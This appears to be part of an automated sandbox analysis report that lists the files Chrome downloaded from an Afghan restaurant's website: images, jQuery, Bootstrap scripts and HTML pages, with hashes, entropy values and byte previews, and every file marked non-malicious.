                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/takeaway
                                                                                                                                                    Preview:<!DOCTYPE html>..<html lang="en">..<head>...<meta charset="utf-8">.. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.. <meta name="author" content="AdagraPro">.. <title>Afghan Hayat Restaurant</title>.. <link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />.... font icons -->.. <link rel="stylesheet" href="assets/vendors/themify-icons/css/themify-icons.css">.. <link rel="stylesheet" href="assets/vendors/animate/animate.css">.... Bootstrap + FoodHut main styles -->...<link rel="stylesheet" href="assets/css/foodhut.css">.. <link rel="stylesheet" href="assets/css/custom.css">.... Google font styles -->.. <link rel="preconnect" href="https://fonts.googleapis.com">.. <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>.. <link href="https://fonts.googleapis.com/css2?family=Dancing+Script:wght@500;600;700&family=Edu+TAS+Beginner&family=Mochiy+Pop+One&family=Pacifico&displ
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1066, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):153337
                                                                                                                                                    Entropy (8bit):7.9435318463218
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:O1GIvJdsn3IWEVu0UVnr4ENEyW9qpjpRtt5R:O1GILGZEo0UtZE3spjpRdR
                                                                                                                                                    MD5:802B5A212D97EA300CDBBDE791A0D1D9
                                                                                                                                                    SHA1:00CC9C152D55D6032CAB9D9A1E8C480E99FC5CF9
                                                                                                                                                    SHA-256:8DE5690C0E771F629BA235B6AC7AC75E859C3BD4F020D39166EB1801300610B3
                                                                                                                                                    SHA-512:1A930106CDAB5A0E80EFE73C32889DB72C682ED88224FFE07CBCFF9E40659357E81D06B531235350D000FFE0807183D3F409A7C47323E20A4E0957279740C460
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-m-2.jpg
                                                                                                                                                    Preview:..../.Exif..MM.*...............@...........*...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:07:18.............0221...................................................................r...........z.(.................................K.......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....;..:+...C`G...=..{.|<..O.YY....h.r......w...C...j..KY.:...u..,.S.F.ZgB.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 68 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):19239
                                                                                                                                                    Entropy (8bit):3.531431490739003
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:1Sdb8kEWmdpMxNX7sc5wUZ6C+dI2wGzpFkIuo4n4RlO6klHXUAyTYonZF+ocN:1SKk6byXT+RwInkh4RlO/sTYoLPcN
                                                                                                                                                    MD5:32EFD231EC2B521AB43F26693D843E2F
                                                                                                                                                    SHA1:0C8F6089342BB5D64401092DA06734E3584DA664
                                                                                                                                                    SHA-256:3330034C4BC2DCBBCFB5D4714153E24F59A03029BD3F538D6776F7BFFA0EC088
                                                                                                                                                    SHA-512:A14D828E70AD94E05FF6621B83DB09C5B339F01F23F085FE83E23B603D38EF5A3936F1F6C1BFC58664A4BCB99AAC82E5184491D9FF5B2299E3BE180EF81EDF0F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/food_menu_mainfood.png
                                                                                                                                                    Preview:.PNG........IHDR...D...@............pHYs...............;jiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2022-07-18T12:26:05+05:30</xmp:CreateDate>. <
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 1300 x 519, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):603860
                                                                                                                                                    Entropy (8bit):7.946881415259013
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:s+Hgx/GqFSo/aaVzMV+LxCVv1WcvY8c6JutwLd9edshxLENU/Y:PafxNYlVv1JwMysh+0Y
                                                                                                                                                    MD5:3F5EF17FF88EBA8C56A23874B3080FBD
                                                                                                                                                    SHA1:E55A10797E5D55B7627EAF291B531D80869775E0
                                                                                                                                                    SHA-256:750A7DCB4FE5EB05BB29CBB2C000B99FAB0E57695BEE3E7684C35E4FDACB5ACD
                                                                                                                                                    SHA-512:9E1E17DCB5D1204DF3E9710581D68ABF25538B98398EAD2DF18D3416ECBBBCC0108354191B55C0A2EA1492E2E1DE1EFCA33E0984BE5D626F071F0D4FC1DD68D5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR................S....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):280364
                                                                                                                                                    Entropy (8bit):5.067215048941603
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:V0Hh4V/Y+TCtlIhTze/RZcYmDvzK8m/7EtPx+WI+Y7cFys/CL/+uQxN0IPfKuGAv:atZcYmDhOgPx+WI+Y7cFycuq1PfQAv5B
                                                                                                                                                    MD5:11C05EB286ED576526BF4543760785B9
                                                                                                                                                    SHA1:7FAA15A054093F3B5D674E63B6567C835A6FA217
                                                                                                                                                    SHA-256:5A93A88493AA32AAB228BF4571C01207D3B42B0002409A454D404B4D8395BD55
                                                                                                                                                    SHA-512:B096B9296AB717DF5039E8A350E9BD3BE0600E056DCEB58105A819B63956EC5DC8E3B34ED4E68D26F6EEB7EF4A38F9A336BE166F76E5538BD0890762F9993AC2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:/*!. * jQuery JavaScript Library v3.4.1. * https://jquery.com/. *. * Includes Sizzle.js. * https://sizzlejs.com/. *. * Copyright JS Foundation and other contributors. * Released under the MIT license. * https://jquery.org/license. *. * Date: 2019-05-01T21:04Z. */.( function( global, factory ) {..."use strict";...if ( typeof module === "object" && typeof module.exports === "object" ) {....// For CommonJS and CommonJS-like environments where a proper `window`...// is present, execute the factory and get jQuery....// For environments that do not have a `window` with a `document`...// (such as Node.js), expose a factory as module.exports....// This accentuates the need for the creation of a real `window`....// e.g. var jQuery = require("jquery")(window);...// See ticket #14549 for more info....module.exports = global.document ?....factory( global, true ) :....function( w ) {.....if ( !w.document ) {......throw new Error( "jQuery requires a window with a document" );.....}.....return factor
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (7389), with CRLF line terminators
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):55852
                                                                                                                                                    Entropy (8bit):5.439891357467574
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:aytgSaLjkn3DA+wP2LVdHOc1K+t3LN4Bd:hgSaLjknzA+wP2LVdHOc1K+t3Lw
                                                                                                                                                    MD5:F037F0357DEF6F17FCA04FDCFF48F246
                                                                                                                                                    SHA1:14B414B8D7910D97C57F393236ECF609C844DA14
                                                                                                                                                    SHA-256:151B050E060321F18E5015573A40AF2E110E199A2F3BDB96D8FC2F0FCDC6206B
                                                                                                                                                    SHA-512:6CB4350DF83EF81CA491468D109371A2A4CA5EABBA849FD6B827A3812AF5F39A53BE5BE2BD63E4C81DD73E9F7BAC494C85E606688DC9D43FAB821DA3D0563AD5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/dineInMenu
                                                                                                                                                    Preview:<!DOCTYPE html>..<html lang="en">..<head>...<meta charset="utf-8">.. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.. <meta name="author" content="AdagraPro">.. <title>Afghan Hayat Restaurant</title>.. <link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />.... font icons -->.. <link rel="stylesheet" href="assets/vendors/themify-icons/css/themify-icons.css">.. <link rel="stylesheet" href="assets/vendors/animate/animate.css">.... Bootstrap + FoodHut main styles -->...<link rel="stylesheet" href="assets/css/foodhut.css">.. <link rel="stylesheet" href="assets/css/custom.css">.... Google font styles -->.. <link rel="preconnect" href="https://fonts.googleapis.com">.. <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>.. <link href="https://fonts.googleapis.com/css2?family=Dancing+Script:wght@500;600;700&family=Edu+TAS+Beginner&family=Mochiy+Pop+One&family=Pacifico&displ
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1600, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1200], progressive, precision 8, 700x373, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):68979
                                                                                                                                                    Entropy (8bit):7.872524741977161
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:QHFXM23HFXM2dmcLVS16FIVRo0XoyaG4NDfLSac2GG9D1iv7Y:QJvJ5VS16Sq6aGeLLjDGG9DL
                                                                                                                                                    MD5:1A3DDCA29358AF8CA5254428B2C354F7
                                                                                                                                                    SHA1:604D08322245716283A41192A7A88799EAAF12FB
                                                                                                                                                    SHA-256:D174BE56A5E6B59927911AE074F1F08D1E65E9E871B49391B5D3DE3EC9151DB0
                                                                                                                                                    SHA-512:D0646DF287A85CC9151A681A4EFE0D7D2E1AEC8400D09358D66840382B887DC2B96E0A12B89E9138DA06338BCCFE70CF095A37BD990E51FBB14C061E0D15DEF9
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:......Exif..MM.*...........................@...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 17:14:47.............0221...................................u...............................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................U...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..y>.|QC..wk'.U......0....Ht....pc>........7...WO.`..k..5.~.....(..Q..
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 1300 x 519, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):731743
                                                                                                                                                    Entropy (8bit):7.963844619806945
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:w+Hgx/GoveW6pPmKEgA1jVPoTqMH+aOymWmolQHkj63Low1p67zkFd9dBAz5Gx:rkeX/TWPoT7H+aato+E+boup6zkHRAO
                                                                                                                                                    MD5:CD6C44F9A09A223C3D02340FCE34626B
                                                                                                                                                    SHA1:6118E6BCB524834EAC102CCECAFAADA0A1375698
                                                                                                                                                    SHA-256:1F648E04DE6027B10D797CBC9B6245CDA488F57E5C154A3715F4D19EE17F4F34
                                                                                                                                                    SHA-512:64F12171E38054BA852C3E01A0364756C768A3849F2CCF763AB28C85BB9BFCCBE3402ED7304321BB76BAFACBE7B1F47F82BABC76529E5AD5EC332C246A9F9EF8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/Banner_location_image.png
                                                                                                                                                    Preview:.PNG........IHDR................S....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 105 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):39243
                                                                                                                                                    Entropy (8bit):6.026473604157181
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:D50wTdDi5k759U5mu6C/9s/Pb2ZmfCkUrwQkIEzTiRVRbee:FtdDi5cU5D6C/9gPqUfRAkHiRVRbee
                                                                                                                                                    MD5:E0D2250135101D893CD10DC36309633C
                                                                                                                                                    SHA1:51D7BD051DD026C0F37824499332555412728E9C
                                                                                                                                                    SHA-256:90F933EC0781D7F01392BF6621748678A623D07EEB5BBB9598AD5C52A83FFB0E
                                                                                                                                                    SHA-512:402FA4009E1AD6F9B0233375DFBEAE0D48E807B2F21CABCF7892A3B4109CC218BC8455AE6FD17029261AB5FA5E243446CC4E56C12B03148E1489D8A84C832C1E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...i...K.....s......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):4838
                                                                                                                                                    Entropy (8bit):4.78235472677224
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:wxAxkbjWRlUqkONOTHY8XQQpzkyn6h2fOFS05XlTX8/6C:wmxkbja6qkOATH8UQy6hB15h8X
                                                                                                                                                    MD5:252D27257A5B7ED1BCE8FD797EA20A3C
                                                                                                                                                    SHA1:8886023D432A56C0CF15BB0D40F4F81CEA09B8BF
                                                                                                                                                    SHA-256:1EE8AC8EFF7B2C225D85963EE6160F0071297A3FDAF1532688C4FE01CFC0FB94
                                                                                                                                                    SHA-512:22E4BE9B39F9E59A2D11E50DC3AEADF665A3AF5E6891FAB722D2C2BB102B77939B197307A0F7C1CCF03B774625754CE6C79F4E179728B7E07D3F84B8AB89C954
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/vendors/bootstrap/bootstrap.affix.js
                                                                                                                                                    Preview:/* ========================================================================. * Bootstrap: affix.js v3.3.6. * http://getbootstrap.com/javascript/#affix. * ========================================================================. * Copyright 2011-2015 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). * ======================================================================== */...+function ($) {. 'use strict';.. // AFFIX CLASS DEFINITION. // ======================.. var Affix = function (element, options) {. this.options = $.extend({}, Affix.DEFAULTS, options).. this.$target = $(this.options.target). .on('scroll.bs.affix.data-api', $.proxy(this.checkPosition, this)). .on('click.bs.affix.data-api', $.proxy(this.checkPositionWithEventLoop, this)).. this.$element = $(element). this.affixed = null. this.unpin = null. this.pinnedOffset = null.. this.checkPosition(). }.. Affix.VERSION = '3.3.6'..
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=438, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=700], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):98758
                                                                                                                                                    Entropy (8bit):7.917641360443208
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:xJPrv0ljX1MJPrv0ljX1UyfOavEuagHTmHqzEoC7W4D4F7ZzVtfFac0iF+va/c6B:frMyrMFftvERgHqKzVCqlTzVtjHUgii
                                                                                                                                                    MD5:EE1E9A1DB28A04D2BD35C15E3BF9584A
                                                                                                                                                    SHA1:EC703487EC7B1740E8EE9754A247D08E1EFA107C
                                                                                                                                                    SHA-256:B24A8F7653E1629CA9C5C78C03A4E468C3C6F1F48827EBB43912DBB7291C6DB7
                                                                                                                                                    SHA-512:E73480A22D80C98B11CE2E8930CE86CA66FBE17D5F9FBDDE9324BC38D3FCD9ACEF36B0E428CC37860386908B54AFE75DFC569B16C6BF7DA363AD7E4F91627856
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-4.jpg
                                                                                                                                                    Preview:......Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 17:29:29.............0221...................................................................r...........z.(................................-s.......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..}Lzk....(c.%.[.;...g.>.cG....>.t.. ....d.....+..W.....k...v.:..E.{Z.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):82284
                                                                                                                                                    Entropy (8bit):7.336778051720278
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:Xi6EyWJIfl86LwKo42YLXAatcOBucfomo9MIXwllh8gxV:S6EPL1JYLwUqcAwZV
                                                                                                                                                    MD5:6122855657180B47E458E4DEC6511619
                                                                                                                                                    SHA1:92D9FC839A47F6836E87D4C66B5B430F0AFD5C62
                                                                                                                                                    SHA-256:6AFED547648B8E634370304FE0E06AE9D7F1D021DC80F76CC9DC6FF689053558
                                                                                                                                                    SHA-512:734C596D4FF002CF32CF6A0DB191EC221D5410E6E65F41A862DFA528931D6B4AEEE22B80D2521BF4201DF46ED793919D1D4BB8029A8B80353B98DA9C40961874
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/cook_breakfast.png
                                                                                                                                                    Preview:.PNG........IHDR.............=..2....pHYs...............?ciTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmpMM:DocumentID>adobe:docid:photoshop:dc45d2e5-0cac-11ed-a552-baea9d3ae441</xmpMM:DocumentID>. <xmpMM:InstanceID>xmp.iid:88205e03-fe26-a4
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 900x900, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):191209
                                                                                                                                                    Entropy (8bit):7.943422058095445
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:93JTW3JTfmEx4FHGX0uTOh9l7jmdp72Rphfmz1tenuJUb/xDozwi1gF2fAV7PTew:9YSJO0u+l7Kdp72R21tenuJUb/azNgsU
                                                                                                                                                    MD5:90AB6C9FCB9047C5288A7A254F9F7220
                                                                                                                                                    SHA1:6F12E24BAED8E50C1CD394128AF26CDD8F54E471
                                                                                                                                                    SHA-256:FE5E9F3CA6689B153C1C4020746C76E72FDACB52DA12BC9A8AB52EE6D94ACF8D
                                                                                                                                                    SHA-512:423D2A8E62512DEEC0DEF7E6373F13B499E61E3FF86FF816B50E6E591CFB0D875D2D2424FD7625809D92B93090B7F75029C40B86B46998B8852FA42B53BF13D1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....#*Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:29 18:40:35....)...........2...........:."...........'...........0...........2..................0231...........B...........V...........j...........q...........x........................................................................................................39..........39..........39..........0100.....................................................................................................................................0...........1...........2..........4..........5.................................<........2023:08:19 16:42:53.2023:08:19 16:42:53.+10:00.+10:00.+10:00............................".................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1600, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1200], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):120654
                                                                                                                                                    Entropy (8bit):7.936864042197478
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:uiMuLiMuDCaOIcFFhn0aJt6BJ6Ky5xhX4I:dQDCnNl0aJt6ShyI
                                                                                                                                                    MD5:A5F790FB0EB72388A2536DBB05196448
                                                                                                                                                    SHA1:8D1CA88EBF7014CDF819D886DD6341F7C6FFDA1C
                                                                                                                                                    SHA-256:AC886E194DD0CCFACE06939F84DDC47243C079138A8FD842F4C473FDC24F8B85
                                                                                                                                                    SHA-512:FFB602C7EAD506905A63F69DBF0084D1EB67DBDE954A407EFFC06163C3D6EB6B88D083154C2728962E212EA9BA039B5D90443E3B48647211816254F91F248142
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-1.jpg
                                                                                                                                                    Preview:....(.Exif..MM.*...........................@...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 17:57:48.............0221...................................................................r...........z.(................................' .......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....G.Qy........p...Q...V...1......8h..Mi........./..}....,y"...}...B~.s.r.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 116 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):38154
                                                                                                                                                    Entropy (8bit):5.958781621243104
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:250wAdDiJks5mU51j/dgM7pHwzSXTcrg4bDS6ru/N6taj3LIcs3ZGKEAgj2lo7:MidDiJgU51jO8wITfAru/gtaYc8GKEf5
                                                                                                                                                    MD5:CDDFE74CBBB4F5E5C256E8CDE3EAECA6
                                                                                                                                                    SHA1:7B11744C35038255925FB7F1F654400EE90DFFEF
                                                                                                                                                    SHA-256:252A75D08EF40539F3217D8B9CEB255AAA72A625E12CC61C16C11BA177F30D84
                                                                                                                                                    SHA-512:8A3D53C43EF23D508D3ED8FFCFCB681D7D94981DCA721AEAA71F878A7060ACA4B14002CCD694A0A3EBE7D7B014454AE7FBB5ED1576C805229120414320AE1376
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
